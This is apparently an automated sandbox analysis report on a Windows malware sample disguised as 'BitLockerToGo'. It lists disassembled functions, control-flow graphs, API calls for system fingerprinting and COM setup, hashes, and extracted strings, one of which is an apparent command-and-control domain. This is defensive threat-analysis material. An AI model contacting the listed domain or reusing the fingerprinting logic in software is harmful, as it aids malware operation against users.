19520->19519 19522 4425f0 LdrInitializeThunk 19520->19522 19522->19519 19523 442eb7 19524 442ee0 19523->19524 19527 4425f0 LdrInitializeThunk 19524->19527 19526 443154 19527->19526 19528 43c27a 19529 43c2a0 19528->19529 19529->19529 19530 43c2be SysAllocString 19529->19530 19531 43c330 19530->19531 19531->19531 19532 43c377 SysAllocString 19531->19532 19533 43c39c 19532->19533 19534 43c6ba SysFreeString SysFreeString 19533->19534 19536 43c6a0 19533->19536 19537 43c426 VariantInit 19533->19537 19538 43c4df SysStringLen 19533->19538 19539 43c68e VariantClear 19533->19539 19541 43c470 19533->19541 19543 43c501 19533->19543 19535 43c6d5 SysFreeString 19534->19535 19540 43c6e9 19535->19540 19536->19534 19537->19541 19538->19543 19539->19536 19542 43c702 GetVolumeInformationW 19540->19542 19541->19538 19541->19539 19541->19541 19541->19543 19544 43c723 19542->19544 19545 43c7e9 19542->19545 19543->19539 19544->19545 19546 43c92a 19544->19546 19551 43c8de 19544->19551 19555 4425f0 LdrInitializeThunk 19544->19555 19547 43fad0 RtlFreeHeap 19546->19547 19552 43c930 19547->19552 19548 43fe30 LdrInitializeThunk 19548->19551 19549 43fec0 LdrInitializeThunk 19549->19551 19550 43fd10 LdrInitializeThunk 19550->19551 19551->19546 19551->19548 19551->19549 19551->19550 19552->19545 19556 4425f0 LdrInitializeThunk 19552->19556 19555->19551 19556->19545 19557 43c258 CoSetProxyBlanket

                                                                                                                  Executed Functions

                                                                                                                  Function 00410CE0 Relevance: 23.2, APIs: 3, Strings: 10, Instructions: 432COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 0 410ce0-410d4a CoInitialize 1 410d51-410d6c CoInitializeSecurity 0->1 2 4110b1 CoUninitialize 0->2 3 4110c1-4110f8 GetSystemDirectoryW 0->3 4 410d73-410daa call 43c080 0->4 5 4110b7-4110c0 0->5 6 41109d-4110aa 0->6 1->2 1->3 1->4 1->6 14 411150 1->14 19 41113e-411147 call 403af0 1->19 2->5 20 4110fa-4110fd 3->20 21 4110ff 3->21 31 410db0-410dfe 4->31 6->2 8 411160-411166 call 40c660 6->8 9 411200 6->9 10 411220-411225 call 43b800 6->10 11 411202-411209 6->11 12 41122b-41122e 6->12 13 41116f-411192 call 404430 6->13 6->14 15 411210 6->15 16 411235 6->16 17 411156-41115f call 40c660 6->17 18 411216-41121b call 43b800 6->18 6->19 8->13 10->12 11->10 11->12 11->15 11->16 11->18 12->2 12->3 12->6 12->8 12->9 12->10 12->11 12->12 12->13 12->14 12->15 12->16 12->17 12->18 12->19 41 4111a0-4111e5 13->41 17->8 18->10 19->14 20->21 28 411100-411108 20->28 21->28 37 41110a-41110d 28->37 38 41110f 28->38 31->31 40 410e00-410e48 31->40 37->38 39 411110-411137 call 40c650 call 43cc60 call 43fad0 37->39 38->39 39->2 39->8 39->9 39->10 39->11 39->12 39->13 39->14 39->15 39->16 39->17 39->18 39->19 43 410e50-410e69 40->43 41->41 44 4111e7-4111ff call 4044b0 41->44 43->43 46 410e6b-410e77 43->46 44->9 49 410e79-410e7f 46->49 50 410e8b-410e95 46->50 53 410e80-410e89 49->53 54 410e97-410e98 50->54 55 410eab-410eb7 50->55 53->50 53->53 57 410ea0-410ea9 54->57 58 410eb9-410ebf 55->58 59 410ecb-410ed3 55->59 57->55 57->57 61 410ec0-410ec9 58->61 62 410ed5-410ed6 59->62 63 410eeb-410fd3 59->63 61->59 61->61 64 410ee0-410ee9 62->64 65 410fe0-410ff4 63->65 64->63 64->64 65->65 66 410ff6-41101f 65->66 67 411020-411067 66->67 67->67 68 411069-41108b call 40fa00 67->68 70 411090-411096 68->70 70->2 70->3 70->6 70->8 70->9 70->10 70->11 70->12 70->13 70->14 70->15 70->16 70->17 70->18 70->19
                                                                                                                  APIs
                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00410D41
                                                                                                                  • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00410D63
                                                                                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004110C7
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Initialize$DirectorySecuritySystem
                                                                                                                  • String ID: 2971BE6964AA73485AC05C7BE5FFBF3A$6)./$AR$FT]N$NP]V$UE$XR$ivuf$sergei-esenin.com$xA
                                                                                                                  • API String ID: 1379780170-3256075778
                                                                                                                  • Opcode ID: 2f276102ee0e3c0d505fc82d5b5d93b8a2e0c06ee12d51b879fde74540723e97
                                                                                                                  • Instruction ID: b314c5fb5ec9feb83f7ba8cf055eee09dd8c421c4eb33decb5d20b858ea80011
                                                                                                                  • Opcode Fuzzy Hash: 2f276102ee0e3c0d505fc82d5b5d93b8a2e0c06ee12d51b879fde74540723e97
                                                                                                                  • Instruction Fuzzy Hash: D6D136B5604B809FD3308F3998823A7BBE1FF46314F14492DD1D64B7A1D779A406CB9A
                                                                                                                  Function 0043C27A Relevance: 14.1, APIs: 9, Instructions: 630memoryCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 71 43c27a-43c296 72 43c2a0-43c2bc 71->72 72->72 73 43c2be-43c32a SysAllocString 72->73 74 43c330-43c375 73->74 74->74 75 43c377-43c3a4 SysAllocString 74->75 77 43c3d0-43c3dc 75->77 78 43c3f0 75->78 79 43c3f6-43c41f 75->79 80 43c3b4-43c3ba 75->80 81 43c3ab 75->81 82 43c6ba-43c71c SysFreeString * 3 call 444eb0 GetVolumeInformationW 75->82 77->78 78->79 85 43c6b2-43c6b6 79->85 86 43c4c2-43c4d8 79->86 87 43c622-43c62f 79->87 88 43c4c0 79->88 89 43c620 79->89 90 43c640-43c65d 79->90 91 43c426-43c46b VariantInit 79->91 92 43c674-43c677 79->92 93 43c664-43c66d 79->93 94 43c4df-43c4ff SysStringLen 79->94 95 43c68e-43c6a5 VariantClear 79->95 80->77 81->80 112 43c723-43c737 82->112 113 43c7f2-43c7f9 82->113 85->82 86->87 86->89 86->90 86->92 86->93 86->94 86->95 87->90 87->92 87->93 88->86 89->87 90->92 90->93 99 43c470-43c49c 91->99 92->95 93->90 93->92 93->93 96 43c501-43c505 94->96 97 43c53c 94->97 95->85 101 43c515-43c518 96->101 102 43c53e-43c559 call 40c650 97->102 99->99 104 43c49e-43c4ab 99->104 101->102 105 43c51a-43c536 101->105 129 43c615-43c61f 102->129 130 43c55f-43c566 102->130 108 43c4af-43c4b5 104->108 109 43c507-43c513 105->109 110 43c538-43c53a 105->110 108->88 109->101 109->102 110->109 112->113 114 43c740-43c749 112->114 115 43c7c0-43c7cd 112->115 116 43ca00-43ca12 call 43fe30 112->116 117 43ca80-43ca95 call 43fec0 112->117 118 43c765 112->118 119 43c92a-43c954 call 43fad0 112->119 120 43c7e9-43c7ef 112->120 121 43c768-43c78f call 434d30 112->121 122 43c82d-43c82f 112->122 123 43c7f0 112->123 124 43c750-43c75e 112->124 125 43c9d7-43c9ea 112->125 126 43c7d4-43c7e2 112->126 127 43c834-43c865 call 43fa10 112->127 128 43ca19-43ca79 call 43fcf0 call 43fd10 112->128 114->115 114->116 114->117 114->118 114->119 114->121 114->122 114->124 114->125 114->126 114->127 114->128 115->115 115->116 115->117 115->119 115->122 115->125 115->126 115->127 115->128 116->117 116->119 116->128 117->116 118->121 147 43c960-43c9a0 119->147 120->123 149 43c790-43c798 121->149 137 43cabc-43cac3 122->137 124->115 124->116 124->117 124->118 124->119 124->121 124->122 124->125 124->126 124->127 124->128 125->116 125->117 125->119 125->128 126->113 126->114 126->115 126->116 126->117 126->118 126->119 126->120 126->121 126->122 126->123 126->124 126->125 126->126 126->127 126->128 146 43c870-43c8b0 127->146 128->116 128->117 129->89 130->129 132 43c56c-43c57c 130->132 139 43c57e-43c588 132->139 139->129 148 43c58e-43c592 139->148 146->146 151 43c8b2-43c8be 146->151 147->147 156 43c9a2-43c9aa 147->156 152 43c594-43c59b 148->152 153 43c59d-43c5aa 148->153 149->149 154 43c79a-43c7b0 149->154 157 43c8e0-43c8e7 151->157 158 43c8c0-43c8cf 151->158 161 43c5ff-43c604 152->161 162 43c5ce-43c5d6 153->162 163 43c5ac-43c5b2 153->163 154->115 154->116 154->117 154->119 154->122 154->125 154->126 154->127 154->128 159 43c9b0-43c9bf 156->159 160 43cab7-43caba 156->160 164 43c913-43c923 157->164 165 43c8d0-43c8d7 158->165 169 43c9c0-43c9c7 159->169 160->137 161->129 168 43c606-43c60f 161->168 162->161 167 43c5d8-43c5fa 162->167 163->162 166 43c5b4-43c5cc 163->166 164->116 164->117 164->119 164->125 164->128 170 43c8e9-43c8ef 165->170 171 43c8d9-43c8dc 165->171 166->161 167->161 168->129 168->139 172 43ca9a-43caa0 169->172 173 43c9cd-43c9d0 169->173 170->164 175 43c8f1-43c910 call 4425f0 170->175 171->165 176 43c8de 171->176 172->160 177 43caa2-43cab4 call 4425f0 172->177 173->169 174 43c9d2 173->174 174->160 175->164 176->164 177->160
                                                                                                                  APIs
                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 0043C2BF
                                                                                                                  • SysAllocString.OLEAUT32(A7F2A1E7), ref: 0043C37A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocString
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2525500382-0
                                                                                                                  • Opcode ID: 12a8bdb9b6f6454cab4d1651166c86d1f0ee7a083b2212b7071bb308ce98ddeb
                                                                                                                  • Instruction ID: 774555d793f9318b6584dd5a37d188e5f0fb5422c9e0e8b9fdbc3024fa447b05
                                                                                                                  • Opcode Fuzzy Hash: 12a8bdb9b6f6454cab4d1651166c86d1f0ee7a083b2212b7071bb308ce98ddeb
                                                                                                                  • Instruction Fuzzy Hash: 4C220179604301CFD714CF28D891B66B7E2FF8A315F28996DD1868B7A1C739E906CB84
                                                                                                                  Function 0043C0AC Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 91COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 213 43c0ac-43c12e 214 43c130-43c142 213->214 214->214 215 43c144-43c156 214->215 217 43c192-43c1da CoCreateInstance 215->217 218 43c180-43c186 215->218 219 43c168 215->219 220 43c15d 215->220 217->217 217->218 217->219 217->220 221 43c0a0-43c0a7 217->221 222 43c0ab 217->222 218->217 219->218 220->219 222->213
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: Mano
                                                                                                                  • API String ID: 0-660390923
                                                                                                                  • Opcode ID: 687b30e87dbad23f1c3a8b185c35ffd4bb27c32e39341c552f8b8dd3abf9977f
                                                                                                                  • Instruction ID: 6d3762cac6a26fe1520f7b140e42db9dd76463b71a3d16f5c224e2857f2a922c
                                                                                                                  • Opcode Fuzzy Hash: 687b30e87dbad23f1c3a8b185c35ffd4bb27c32e39341c552f8b8dd3abf9977f
                                                                                                                  • Instruction Fuzzy Hash: D4318FB4511700EFD3109F29D946B02BFB4FF4A314F14C69EE4894F696C372940ACBAA
                                                                                                                  Function 0040FF1D Relevance: 2.6, Strings: 2, Instructions: 92COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 232 40ff1d-40ff77 233 40ff80-40ff88 232->233 233->233 234 40ff8a-40ff92 233->234 235 40ffb2-40ffc2 234->235 236 40ff94-40ff9f 234->236 238 40ffc4-40ffc6 235->238 239 40ffe6-410027 235->239 237 40ffa0-40ffb0 236->237 237->235 237->237 240 40ffd0-40ffe2 238->240 243 41002e-410049 239->243 240->240 241 40ffe4 240->241 241->239
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: ()$B![#
                                                                                                                  • API String ID: 0-2254847027
                                                                                                                  • Opcode ID: 746004fa6715f82084249b9fe91d49c716601c16785aa253d9cbd9bfdae1f6b1
                                                                                                                  • Instruction ID: 7cd22eaa68942b92d33cc86fef7670e57c79a0b02bcec4961e68389e029e4acd
                                                                                                                  • Opcode Fuzzy Hash: 746004fa6715f82084249b9fe91d49c716601c16785aa253d9cbd9bfdae1f6b1
                                                                                                                  • Instruction Fuzzy Hash: 3321BDB4108381ABD714CF10D844A3BB7E4EF8A748F40592DF8869B291E734DA09CB5A
                                                                                                                  Function 0040F340 Relevance: 1.7, Strings: 1, Instructions: 419COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 244 40f340-40f3c8 245 40f3d0-40f3d9 244->245 245->245 246 40f3db-40f3ee 245->246 248 40f691-40f698 246->248 249 40f3f5-40f3f7 246->249 250 40f3fc-40f62f 246->250 251 40f69d-40f71f call 40c5b0 246->251 254 40f9b8-40f9c1 248->254 252 40f9c4-40f9cb 249->252 253 40f630-40f672 250->253 260 40f740 251->260 261 40f980-40f98d call 442540 251->261 262 40f8c1-40f8f0 251->262 263 40f742-40f74a 251->263 264 40f883-40f8a3 251->264 265 40f726-40f73f 251->265 266 40f8aa-40f8bf 251->266 267 40f9ab-40f9b5 251->267 268 40f84b-40f87c 251->268 269 40f82e-40f842 251->269 270 40f970-40f97d call 442540 251->270 271 40f930-40f937 251->271 272 40f950 251->272 273 40f751-40f758 251->273 274 40f952-40f95a 251->274 275 40f996 251->275 276 40f999-40f9a2 251->276 277 40f75a-40f76b 251->277 278 40f91d 251->278 279 40f93e-40f943 251->279 253->253 256 40f674-40f67f 253->256 254->252 258 40f683-40f68a 256->258 258->248 258->251 258->260 258->261 258->262 258->263 258->264 258->265 258->266 258->267 258->268 258->269 258->270 258->271 258->272 258->273 258->274 258->275 258->276 258->277 258->278 258->279 260->263 261->275 262->267 262->275 280 40f8f7-40f8fb 262->280 281 40f9d6-40f9dd 262->281 282 40f9cc-40f9d3 262->282 263->261 263->262 263->264 263->266 263->268 263->269 263->270 263->271 263->272 263->273 263->274 263->275 263->276 263->277 263->278 263->279 264->261 264->262 264->266 264->270 264->271 264->272 264->274 264->275 264->276 264->278 264->279 265->260 266->280 267->254 268->261 268->262 268->264 268->266 268->270 268->271 268->272 268->274 268->275 268->276 268->278 268->279 269->268 270->261 271->262 271->272 271->274 271->279 272->274 284 40f795-40f7af 273->284 274->267 274->270 274->275 274->280 274->281 274->282 275->276 276->267 285 40f770-40f78a 277->285 278->271 279->272 298 40f904-40f916 280->298 282->281 294 40f7b0-40f808 284->294 285->285 292 40f78c-40f792 285->292 292->284 294->294 299 40f80a-40f827 294->299 298->261 298->262 298->270 298->271 298->272 298->274 298->275 298->278 298->279 299->261 299->262 299->264 299->266 299->268 299->269 299->270 299->271 299->272 299->274 299->275 299->276 299->278 299->279
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: }y
                                                                                                                  • API String ID: 0-3327190302
                                                                                                                  • Opcode ID: 2d8923c749216e60cd30327a02fb41662980a1a337a75573fb6dd4541fb3159b
                                                                                                                  • Instruction ID: 43636b2d5f994ae026c4e79fecc38f0eb1c520d0b8271bc9293960db2d0ceb79
                                                                                                                  • Opcode Fuzzy Hash: 2d8923c749216e60cd30327a02fb41662980a1a337a75573fb6dd4541fb3159b
                                                                                                                  • Instruction Fuzzy Hash: D70213B5210B00CFD3248F25D895B97BBF5FB49314F148A2DE5AA8BAA0D774B409CF85
                                                                                                                  Function 004425F0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 323 4425f0-442622 LdrInitializeThunk
                                                                                                                  APIs
                                                                                                                  • LdrInitializeThunk.NTDLL(00445B32,005C003F,00000002,00000018,?), ref: 0044261E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-0
                                                                                                                  • Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                                                                  • Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
                                                                                                                  • Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                                                                  • Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82
                                                                                                                  Function 00442B8A Relevance: 1.4, Strings: 1, Instructions: 174COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: @
                                                                                                                  • API String ID: 0-2766056989
                                                                                                                  • Opcode ID: d6f0de40907b7b8b32ab63e6629629f2373b13dd03df179d009bb833d1b65a65
                                                                                                                  • Instruction ID: 43ab6ce6f9b4ffe8deda271e346de03ec0cad2768a2c3f7a78d21f3d95462d4e
                                                                                                                  • Opcode Fuzzy Hash: d6f0de40907b7b8b32ab63e6629629f2373b13dd03df179d009bb833d1b65a65
                                                                                                                  • Instruction Fuzzy Hash: C151F5756093408BE718CF19C89137BB7E2FFC9315F549A2DE48597390EB788905CB0A
                                                                                                                  Function 00442F74 Relevance: 1.4, Strings: 1, Instructions: 149COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 4K
                                                                                                                  • API String ID: 0-3351438540
                                                                                                                  • Opcode ID: 02baefbf224e79af53af7ff0d3c1a7afc23cabfd664b4f537a753a58ffcbbc70
                                                                                                                  • Instruction ID: 45613f1c263a8273573b2830448e4c95824f8a86f650df032127b94f3687798c
                                                                                                                  • Opcode Fuzzy Hash: 02baefbf224e79af53af7ff0d3c1a7afc23cabfd664b4f537a753a58ffcbbc70
                                                                                                                  • Instruction Fuzzy Hash: 2E4115303443019BFB248E14CD92BBB73E5EBC2715F144A2DE591573DAD278AD069B1A
                                                                                                                  Function 0040CD80 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 172threadCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 186 40cd80-40cd8e call 441280 189 40cd94-40cda1 IsUserAnAdmin call 439770 186->189 190 40cf6d-40cf6f ExitProcess 186->190 193 40cda7-40cdbe GetInputState 189->193 194 40cf68 call 442520 189->194 196 40cdc0-40cdd2 193->196 194->190 196->196 197 40cdd4-40cdfb GetCurrentThreadId GetCurrentProcessId 196->197 198 40ce00-40ce40 197->198 198->198 199 40ce42-40ce52 198->199 200 40ce60-40ce97 199->200 200->200 201 40ce99-40ce9b 200->201 202 40cefa-40cf15 201->202 203 40ce9d-40ceb6 201->203 205 40cf20-40cf53 202->205 204 40cec0-40cef8 203->204 204->202 204->204 205->205 206 40cf55-40cf5c call 40de50 205->206 206->194 209 40cf5e call 410ce0 206->209 211 40cf63 call 40f9f0 209->211 211->194
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CurrentProcess$AdminExitInputStateThreadUser
                                                                                                                  • String ID: spqv
                                                                                                                  • API String ID: 2882748383-2206016640
                                                                                                                  • Opcode ID: 64cd9f2cdc271de3c135f5f2847121890b9a6db8ac0d1d5fe6f55c67cd9b9014
                                                                                                                  • Instruction ID: ad351b947d17469f2f642e33c4c6829e9e522de45026ab71fb1458425ec3535f
                                                                                                                  • Opcode Fuzzy Hash: 64cd9f2cdc271de3c135f5f2847121890b9a6db8ac0d1d5fe6f55c67cd9b9014
                                                                                                                  • Instruction Fuzzy Hash: 51414531A183008BD708AB79D99636BBAD2DFE6700F1989BDD4C6DB2D1D97C4802875A
                                                                                                                  Function 004432AA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 223 4432aa-4432b3 GetForegroundWindow call 445600 225 4432b8-4432d2 223->225
                                                                                                                  APIs
                                                                                                                  • GetForegroundWindow.USER32 ref: 004432AA
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ForegroundWindow
                                                                                                                  • String ID: \K
                                                                                                                  • API String ID: 2020703349-3460819091
                                                                                                                  • Opcode ID: e2fea1834c0a78822f8131e5d29736a64dcd6fcb1f5446314925b7ac59144fd4
                                                                                                                  • Instruction ID: 063bc39e15748f4a6b5b4da385d0738b48dd980b00a938cc70d354eb2c792b30
                                                                                                                  • Opcode Fuzzy Hash: e2fea1834c0a78822f8131e5d29736a64dcd6fcb1f5446314925b7ac59144fd4
                                                                                                                  • Instruction Fuzzy Hash: 35D022BCF0811087EA00DB10EC0900A33149B8F3247428031D84953312CA306C1EC7C9
                                                                                                                  Function 00442540 Relevance: 1.6, APIs: 1, Instructions: 67memoryCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 301 442540-442554 302 4425c0-4425c9 call 43fa10 301->302 303 442569-442577 301->303 304 44255b-442562 301->304 305 4425cb-4425d4 call 43fad0 301->305 313 4425d9-4425dd 302->313 306 442580-4425a6 303->306 304->303 304->305 312 4425d6 305->312 306->306 310 4425a8-4425be RtlReAllocateHeap 306->310 310->312 312->313
                                                                                                                  APIs
                                                                                                                  • RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,00000001,00000000,?,00000000,0042B55F,?,?), ref: 004425B8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocateHeap
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1279760036-0
                                                                                                                  • Opcode ID: 8f67ff78f31ca39748cf45f1d831fdd455bc5a1e1b72e85ca22b83caa0179584
                                                                                                                  • Instruction ID: 3bba4366ca851911442764dbfc91f2820ba5381dd11dd892f8440e7a56c0e703
                                                                                                                  • Opcode Fuzzy Hash: 8f67ff78f31ca39748cf45f1d831fdd455bc5a1e1b72e85ca22b83caa0179584
                                                                                                                  • Instruction Fuzzy Hash: 02018EBA600301DBE3149F25FCB0927B759EB9A354F08443DF54683650D675980DD256
                                                                                                                  Function 0043FAD0 Relevance: 1.5, APIs: 1, Instructions: 41memoryCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 314 43fad0-43fadf 315 43fae6-43faf9 314->315 316 43fb44-43fb48 314->316 317 43fb00-43fb30 315->317 317->317 318 43fb32-43fb3e RtlFreeHeap 317->318 318->316
                                                                                                                  APIs
                                                                                                                  • RtlFreeHeap.NTDLL(?,00000000,?), ref: 0043FB3E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: FreeHeap
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3298025750-0
                                                                                                                  • Opcode ID: 923f309e1832be230594eba85964962d5c131df6e97af1b7e9130246d1ee294b
                                                                                                                  • Instruction ID: a241a5685252a34bf8753c4a36e4a80d628d1916c28273a4b5eb161b3b50b8c0
                                                                                                                  • Opcode Fuzzy Hash: 923f309e1832be230594eba85964962d5c131df6e97af1b7e9130246d1ee294b
                                                                                                                  • Instruction Fuzzy Hash: 03F04671D292608BD7049B38EE2465AB79A9FC6209F05817CD8C05F6D8C7344D66DE8B
                                                                                                                  Function 0043C1E2 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 319 43c1e2-43c20e 320 43c210-43c222 319->320 320->320 321 43c224-43c248 SysAllocString 320->321 322 43c24c-43c24e 321->322
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocString
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2525500382-0
                                                                                                                  • Opcode ID: ceca2d0dcbe3f19ee7d2366c5e1cdf8af75e423c3cc94959c4c9a04e02c8a5b6
                                                                                                                  • Instruction ID: 0edef3b5fa914aaf0c4d58fd4414efa279be1f1b5fcd2aaaaa88f42ba277cb32
                                                                                                                  • Opcode Fuzzy Hash: ceca2d0dcbe3f19ee7d2366c5e1cdf8af75e423c3cc94959c4c9a04e02c8a5b6
                                                                                                                  • Instruction Fuzzy Hash: AF018C74110A41AFE3108F6AC444BA6BBF0FB9E310F508A58E5568BB51C7B5F852DFD0
                                                                                                                  Function 0043C258 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 324 43c258-43c270 CoSetProxyBlanket
                                                                                                                  APIs
                                                                                                                  • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043C268
                                                                                                                  Memory Dump Source
